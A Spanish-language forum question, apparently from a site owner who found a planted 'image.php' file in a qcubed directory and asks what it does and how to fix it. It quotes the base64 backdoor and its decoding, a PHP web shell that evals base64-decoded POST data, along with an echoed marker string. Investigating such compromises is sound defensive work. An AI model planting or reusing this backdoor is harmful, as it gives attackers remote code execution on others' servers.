¿Qué hace eval en la variable $ _POST ['e'] codificada en base64 realmente?

Ok, esto es lo que busqué en Google:

Parece que hay un archivo cargado llamado "image.php" que se carga en un directorio qcubed.

Ese archivo image.php contiene el siguiente código base64:

aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==

decodificado se agrega a esto:

if(isset($_POST['e']))

eval(base64_decode($_POST['e']));

echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';

Al buscar la cadena pasada encontré vulnerabilidades simillar qcubed en otros sitios.

Decodificando la última cadena con eco que obtuve:

196.231-172.28:ifacermpubmice:afac42eri02

Lo cual realmente no entiendo lo que hace (usando:http://ostermiller.org/calc/encode.html)

¿Me puede explicar a qué me enfrento en particular aquí? ¿Qué vulnerabilidad de seguridad debo abordar para solucionar esto?

Respuestas a la pregunta(2)

Su respuesta a la pregunta